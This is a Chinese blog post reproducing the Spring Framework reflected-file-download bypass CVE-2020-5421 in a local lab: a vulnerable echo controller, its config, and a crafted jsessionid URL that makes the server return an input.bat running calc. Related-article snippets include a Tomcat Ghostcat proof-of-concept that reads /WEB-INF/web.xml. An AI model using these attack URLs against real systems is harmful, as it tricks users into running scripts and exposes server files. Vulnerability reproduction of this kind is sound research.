Spring 安全漏洞 CVE-2020-5421复现

最新推荐文章于 2024-07-07 13:51:00 发布
置顶 最新推荐文章于 2024-07-07 13:51:00 发布
阅读量7.8k 收藏 14
点赞数 7
分类专栏: 安全漏洞 文章标签: spring java 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40394952/article/details/112439595
版权

Spring 安全漏洞 CVE-2020-5421复现

文章目录

漏洞概述

CVE-2020-5421 可通过jsessionid路径参数,绕过防御RFD攻击的保护。先前针对RFD的防护是为应对 CVE-2015-5211 添加的。
什么是RFD

反射型文件下载漏洞(RFD)是一种攻击技术,通过从受信任的域虚拟下载文件,攻击者可以获得对受害者计算机的完全访问权限。

影响版本

Spring Framework 5.2.0 - 5.2.8
Spring Framework 5.1.0 - 5.1.17
Spring Framework 5.0.0 - 5.0.18
Spring Framework 4.3.0 - 4.3.28

漏洞复现

github地址:https://github.com/pandaMingx/CVE-2020-5421

版本

基于SpringBoot-2.1.7.RELEASE,Spring-xxx-5.1.9.RELEASE进行测试。

   <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.1.7.RELEASE</version>
        <relativePath/>
    </parent>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
    </dependencies>

复现代码

@Controller
@RequestMapping(value = "spring")
public class cve20205421 {

    // localhost:8080/spring/input?input=hello
    @RequestMapping("input")
    @ResponseBody
    public String input(String input){
        return input;
    }
}

额外配置

spring.mvc.pathmatch.use-suffix-pattern=true
spring.mvc.contentnegotiation.favor-path-extension=true

在url中添加;jsessionid=,如http://localhost:8080/spring/;jsessionid=/input.bat?input=calc,就会下载名为input.bat的可执行文件。

漏洞分析

CVE-2020-5421是针对CVE-2015-5211修复方式的绕过,定位到CVE-2015-5211的修复代码
org.springframework.we

最低0.47元/天 解锁文章
pandamig
关注
  • 7
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
CVE-2020-5421 —— Spring Framework反射型文件下载漏洞
战神/calmness的博客
12-10 998
目录 Spring Framework组件介绍 描述 影响版本 过程 修复建议 CVE-2020-5421 | Spring Framework反射型文件下载漏洞 Spring Framework组件介绍 Spring Framework 是一个开源的 Java/Java EE 全功能栈(full-stack)的应用程序框架,以 Apache 许可证形式发布,也有 .NET 平台上的移植版本。Spring Framework 提供了一个简易的开发方式,这种开发方式可以避免那些可能致使底层
Spring连环CVE-2015-5211和CVE-2020-5421漏洞升级教程!
xmt1139057136的专栏
08-14 2081
你知道的越多,不知道的就越多,业余的像一棵小草!你来,我们一起精进!你不来,我和你的竞争对手一起精进!编辑:业余草推荐:https://www.xttblog.com/?p=5259我们不...
Spring Framework 反射型文件下载漏洞(CVE-2020-5421复现
玄道的网安博客
12-30 4322
漏洞概述 Spring是一个Java/Java EE/.NET的分层应用程序框架。 Spring Framework 存在反射型文件下载漏洞 。 此漏洞由于Spring Framework并没有对filename传入的文件名进行严格的安全检测,攻击者可以通过截断的方式控制filename变量值,下载任意格式的文件。 影响版本 Spring Framework 5.2.0 – 5.2.2 Spring Framework 5.1.0 – 5.1.12 Spring Framework ..
Spring框架RFD漏洞 (CVE-2020-5421) 解决方案】
weixin_42864006的博客
08-12 4008
Spring框架RFD漏洞 (CVE-2020-5421) 解决方案
解决Spring Boot中的安全漏洞与防护策略
最新发布
微赚淘客开发者博客
07-07 773
本文深入探讨了Spring Boot中常见的安全漏洞及防护策略,介绍了使用Spring Security来加强应用程序的安全性,并提出了一些其他防范措施和最佳实践。Spring Security是Spring Framework提供的一种安全框架,能够有效地保护应用程序免受常见的安全威胁。在实际应用开发中,安全工作是一个持续不断的过程。除了基础的防御措施外,团队应该定期进行安全审计和漏洞扫描,保持系统和依赖库的更新,及时修复已知的安全漏洞,并且进行安全培训以提高开发人员的安全意识。
Spring Framework反射型文件下载漏洞(CVE-2020-5421)解决方案
09-28 928
一、综述 近日,VMware Tanzu发布安全公告,公布了一个存在于Spring Framework中的反射型文件下载(Reflected File Download,RFD)漏洞CVE-2020-5421CVE-2020-5421 可通过jsessionid路径参数,绕过防御RFD攻击的保护。先前针对RFD的防护是为应对 CVE-2015-5211 添加的。 攻击者通过向用户发送带有批处理脚本扩展名的URL,使用户下载并执行文件,从而危害用户系统。 官方已发布修复了漏洞的新版本。 二、影响范围
Spring框架反射型文件下载漏洞 CVE-2020-5421
WgRui的博客
12-16 4716
Spring升级
Spring Boot Actuator的Env端点存在本地文件包含(LFI)漏洞CVE-2020-5421
日拱一卒无有尽,功不唐捐终入海
08-28 1415
背景: Spring Boot Actuator的Env端点存在本地文件包含(LFI)漏洞CVE-2020-5421。被扫描到需要解决。Spring Boot Actuator是Spring Boot的一个子项目,主要用于监控和管理Spring Boot应用程序。在开发或测试环境中,开发者通常会开启所有Actuator的端点,包括/env端点,以便于对应用程序进行诊断和调试。但在生产环境中,这种配置可能会导致安全问题。就是一个影响的安全漏洞。这个漏洞主要涉及到环境(Env)端点。
Apache Shiro权限绕过漏洞 (CVE-2020-11989) 挖掘分析和复现
smellycat000的专栏
11-12 1840
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 简介Apache Shiro作为Java框架,可被用于身份认证、授权等任务。整合Apache S...
Shiro 权限绕过漏洞复现CVE-2020-1957)
m0_48520508的博客
01-27 2634
0x00简介 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 0x01漏洞概述 Shiro框架通过拦截器功能来对用户访问权限进行控制,如anon, authc等拦截器。anon为匿名拦截器,不需要登录即可访问;authc为登录拦截器,需要登录才可以访问。主要是Spring web在匹配url的时候没有匹配上/导致绕过 0x02影响范围 Ap
VMware Tanzu发布安全公告,在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和较旧的不受支持的版本中
罗彬桦的博客
08-25 596
漏洞描述: VMware Tanzu发布安全公告,在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和较旧的不受支持的版本中,公布了一个存在于Spring Framework中的反射型文件下载(Reflected File Download,RFD)漏洞CVE-2020-5421CVE-2020-5421 可通过jsessionid路径参数,绕过防御RFD攻击的保护。先前针对RFD的防护是为应对 CVE-2015-5
spring-web 5.0.9 release漏洞问题
qq_23727789的博客
12-09 674
检查下pom.xml下这一段,目前spring-web (5.2.3之前的版本5.2.X),5.1,X,5.0.X 都存在文件下载漏洞问题,故此处由原先的2.0.5.Release----->2.2.5.Release ,打包出来的spring-web 版本为5.2.4.Release ,刚好排除出漏洞的版本 ...
Spring MVC 之 URL PathMatcher
t_chao的专栏
09-09 2592
SpringBoot 前缀匹配规则配置: spring: mvc: pathmatch: use-suffix-pattern: true use-registered-suffix-pattern: true 目前基本所有的官方商城项目都是使用的spring mvc 框架,使用@RequestMapping来定义具体的url,例如: 示例1 1 2 3 4 5 6 7 8
SpringBoot2.0拦截.do后缀的请求
kanaiji123的博客
05-14 6005
最近在进行项目升级的时候发现一个奇怪的现象,在代码几乎保持原样的情况下,项目升级完成后访问controller层的方法一直报404,查看启动信息,发现controller层的接口已经扫描到了。查阅资料后考虑是不是application.properties中服务项目名配置格式导致的。 SpringBoot版本 配置 1.x server.context-path=/Project...
spring boot之spring mvc路径匹配
LZ的博客
02-16 7220
springboot目录 第一种方式 第一步,application.yml添加如下配置,use-suffix-pattern的作用是将http://www/ww.xx的链接同http://www/ww等价,配置完后会在匹配servlet时将.xx自动忽略 spring: mvc: pathmatch: use-suffix-pattern: false # ...
Jackson-databind 反序列化漏洞(CVE-2020-36179 ~ CVE-2020-36189)
weixin_45626288的博客
12-01 3944
2021年1月7日,jackson-databind官方发布安全通告,披露jackson-databind < 2.9.10.8存在多个反序列化远程代码执行漏洞(CVE-2020-36179 ~ CVE-2020-36189),利用该漏洞,攻击者可远程执行代码,控制服务器。 2020年12月17日,jackson-databind官方发布安全通告,披露jackson-databind < 2.9.10.8存在反序列化远程代码执行漏洞(CVE-2020-35490/CVE-2020-35491).
springboot-1总结
hxyi321的博客
09-10 154
SpringBoot 一、SpringBoot常用注解 1、@Configuration注解与 @Bean (1)@configuration spring配置注解,贴有这个注解的类,表示该类为配置类 作用:把普通类变为配置类 功能等价于:// applicationContext.xml (2)@Bean 是spring bean 实例标签,贴有该注解的方法,表示该方法为实例方法 作用:作用:把普通方法变成实例方法,创建对象,并把实例方法对象交由spring容器管理 功能等
Tomact_CVE-2020-1938漏洞复现
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 复现漏洞:使用以下命令触发漏洞复现: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

pandamig

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值